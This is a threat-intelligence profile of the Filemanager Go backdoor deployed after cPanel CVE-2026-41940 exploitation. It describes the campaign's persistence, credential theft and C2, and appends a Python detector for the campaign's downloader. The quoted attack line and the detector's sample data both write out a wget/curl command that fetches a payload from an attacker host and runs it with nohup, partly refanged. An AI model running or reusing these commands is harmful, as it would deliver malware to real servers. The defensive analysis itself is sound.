filemanager
Filemanager is a cross-platform remote-control trojan/backdoor written in Go that supports Darwin, Linux, and Windows. In the reported campaign, it was deployed after exploitation of the critical cPanel/WHM authentication-bypass vulnerability CVE-2026-41940, primarily against compromised Linux hosting environments. The intrusion chain described in public reporting includes automated exploitation of the cPanel flaw, installation of SSH persistence, deployment of a PHP webshell, hijacking of cPanel login pages with malicious JavaScript to steal credentials, collection of bash history, SSH data, device information, database passwords, and valiases data, and finally installation of Filemanager for persistent remote access. Filemanager exposes a web-based management interface on an attacker-specified port and provides remote administration capabilities including file management, remote command execution, and shell access. Researchers attribute the activity to the threat actor Mr_Rot13, which used infrastructure including wpsock.com to install Filemanager, alongside wrned.com and cp.dene.de.com in the broader campaign. A Linux AMD64 Filemanager sample is reported with MD5 9305b4ebbb4d39907cf36b62989a6af3.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
The campaign uses an automated infection chain that implants SSH keys, drops a PHP webshell, hijacks login pages, steals credentials, and installs the Filemanager backdoor.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (3 techniques)
The backdoor supports file management, remote command execution, and shell functionality.
Persistence (5 techniques)
they deploy an “infector” that first changes the server’s root password and plants a hidden login key so attackers can return via SSH
SSH Implantation: The infector hardcodes a new root password and plants an attacker-controlled SSH public key, ensuring persistent privileged access.
This vulnerability allows for authentication bypass and grants remote attackers elevated control over the control panel.
Privilege Escalation (3 techniques)
CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.
Stealth (2 techniques)
Credential Access (3 techniques)
This web shell facilitates file management and remote command execution, and is used to inject JavaScript code that steals login credentials
Collection (3 techniques)
The infector also collects sensitive information, such as bash history, SSH data, and database passwords
Command and Control (4 techniques)
sends them to an attacker-controlled server... data is exfiltrated both to the attackers’ own servers and to a private Telegram group
The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'
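As an added defensive example (not code from the page or from the cited reports), this Python script scores shell-history or process command lines for the downloader pattern quoted above: a wget -O download with a curl -o fallback, curl with TLS verification disabled (-k), and nohup background execution, plus a match against the infrastructure named on this page. It goes beyond the page by also flagging the same pattern when the host is not one of the known domains; the sample lines, the weights and the threshold are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Infrastructure named in public reporting on this campaign (refanged from the page).
KNOWN_HOSTS = {"cp.dene.de.com", "wrned.com", "wpsock.com"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
FLAG_THRESHOLD = 3  # assumption: tune to your own environment

@dataclass
class Finding:
    line_no: int
    score: int
    reasons: list = field(default_factory=list)

def curl_insecure(line: str) -> bool:
    """True if any curl invocation on the line disables TLS verification (-k / --insecure)."""
    for cmd in re.split(r"\|\||;|&&", line):
        toks = cmd.split()
        if "curl" in toks:
            opts = toks[toks.index("curl") + 1:]
            if any(t == "--insecure" or re.fullmatch(r"-[A-Za-z]*k[A-Za-z]*", t) for t in opts):
                return True
    return False

def score_line(line: str) -> tuple:
    """Return (score, reasons) for one command line; higher means more suspicious."""
    score, reasons = 0, []
    hits = {h.lower() for h in URL_RE.findall(line)} & KNOWN_HOSTS
    if hits:
        score += 5; reasons.append("known campaign host: " + ",".join(sorted(hits)))
    if re.search(r"\bwget\b.*\s-O\s.*\|\|.*\bcurl\b.*\s-o\s", line):
        score += 2; reasons.append("wget -O || curl -o fallback download to a file")
    if curl_insecure(line):
        score += 1; reasons.append("curl with TLS verification disabled")
    if re.search(r"\bnohup\b.*&\s*$", line):
        score += 1; reasons.append("nohup background execution")
    return score, reasons

def scan(lines) -> list:
    """Score every line and keep those at or above FLAG_THRESHOLD."""
    return [Finding(i, s, r) for i, l in enumerate(lines, 1)
            for s, r in [score_line(l)] if s >= FLAG_THRESHOLD]

# Constructed sample lines: one mirrors the quoted downloader, two are benign,
# one shows the same pattern pointed at a documentation-range IP instead of a known host.
SAMPLE_LINES = [
    "wget -q -O \"$F\" 'https://cp.dene.de.com/Update' || curl -sk -o \"$F\" 'https://cp.dene.de.com/Update'; nohup \"$F\" >/dev/null 2>&1 &",
    "wget -q -O /tmp/pkg.tar.gz https://example.org/pkg.tar.gz",
    "nohup ./backup.sh >/dev/null 2>&1 &",
    "wget -q -O /dev/shm/u 'https://203.0.113.5/Update' || curl -sk -o /dev/shm/u 'https://203.0.113.5/Update'; nohup /dev/shm/u &",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f.line_no}: score {f.score}: " + "; ".join(f.reasons))
```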
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups (IPs, domains and DNS infrastructure; MD5, SHA-1 and SHA-256 file hashes; other indicator types from public reporting).
Recent activity
8 sources tracked across advisories, community write-ups, and news.
A backdoor installed in the Mr_Rot13 campaign following exploitation of CVE-2026-41940.
A backdoor/web shell deployed on compromised cPanel systems that enables file management and remote command execution, supports credential theft via injected JavaScript, and is part of a broader cross-platform compromise workflow.
A backdoor/remote-control trojan deployed on compromised cPanel servers to provide persistent unauthorized access. It is delivered by the Go-based Payload malware and used after exploitation of cPanel to maintain control over victims.
A cross-platform remote-access backdoor written in Go with builds for Linux, Windows, and macOS. It exposes a web-based management console, supports file management, remote command execution, interactive shell access, steals credentials, and helps maintain persistent access.